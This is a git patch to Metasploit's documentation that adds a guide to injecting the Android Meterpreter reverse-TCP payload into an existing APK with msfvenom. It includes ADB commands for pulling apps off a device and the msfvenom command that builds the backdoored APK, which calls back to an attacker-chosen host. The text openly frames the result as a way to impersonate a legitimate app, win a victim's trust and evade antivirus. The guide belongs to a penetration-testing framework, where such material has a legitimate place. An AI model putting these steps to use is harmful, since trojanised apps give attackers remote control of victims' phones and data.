From 7fe41f5e4e9a2cd851b70c2feb5b41b0bb0a48c0 Mon Sep 17 00:00:00 2001 From: Tim W Date: Tue, 3 Jul 2018 15:20:18 +0800 Subject: [PATCH] fix #10187, add documentation for APK injection --- .../payload/android/meterpreter/injection.md | 51 +++++++++++++++++++ .../android/meterpreter/reverse_tcp.md | 9 ++-- 2 files changed, 57 insertions(+), 3 deletions(-) create mode 100644 documentation/modules/payload/android/meterpreter/injection.md diff --git a/documentation/modules/payload/android/meterpreter/injection.md b/documentation/modules/payload/android/meterpreter/injection.md new file mode 100644 index 0000000000..bf8e409a4a --- /dev/null +++ b/documentation/modules/payload/android/meterpreter/injection.md @@ -0,0 +1,51 @@ +You can inject the Android Meterpreter into an existing APK using msfvenom. This +will allow you to impersonate an existing application, which may make it easier +to convince your victim to install the APK. + +## Vulnerable Application + +It should be possible to inject Meterpreter into any APK, however some applications +have complex resource structures which may not work with `apktool`. +Additionally some applications have security measures that prevent the application +from working as expected once it has been modified. + +**Finding APKs** + +There are many websites that provide standalone APK that can be downloaded, e.g: +APKPure, APKMirror, RAW APK. +You can also build a simple application yourself with Android Studio. + +Additionally you can pull APKs from a device connected via ADB: + +``` +$ adb shell pm list packages | grep app +package:com.existing.app +$ adb shell pm path com.existing.app +package:/data/app/com.existing.app-1/base.apk +$ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk +[100%] /data/app/com.existing.app-1/base.apk +``` + +## Requirements + +APK Injection (as opposed to generating a single APK payload) requires a few tools +to be present on your command line already: + +* [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK +* [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates +* [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK + +Installing these tools (if they are not installed already) will depend on your OS. +Apktool can be installed manually or automatically (e.g `brew install apktool`). +keytool and jarsigner can be installed by installing the appropriate JDK. + +## Verification Steps + +``` +./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk +``` + +Next, start an Android device. Upload the APK, and execute it, as you would with +a [normal Android meterpreter APK](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md). + + diff --git a/documentation/modules/payload/android/meterpreter/reverse_tcp.md b/documentation/modules/payload/android/meterpreter/reverse_tcp.md index 849d892714..7d1cfe737e 100644 --- a/documentation/modules/payload/android/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md @@ -41,21 +41,24 @@ msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk msf payload(reverse_tcp) > ``` -To create the APK with msfvenom: +### To create the APK with msfvenom: ``` ./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk ``` +### To inject meterpreter into an existing APK with msfvenom: + You can also add Android meterpreter to any existing APK. This will make it harder for Anti-virus software to detect the payload, and allow you read internal files and take -screenshots of the Android app you are backdooring: - +screenshots of the Android app that you are backdooring: ``` ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk ``` +[Please see here for more documentation on Android injection](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/injection.md). + Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, so please refer to the Scenarios section for more information.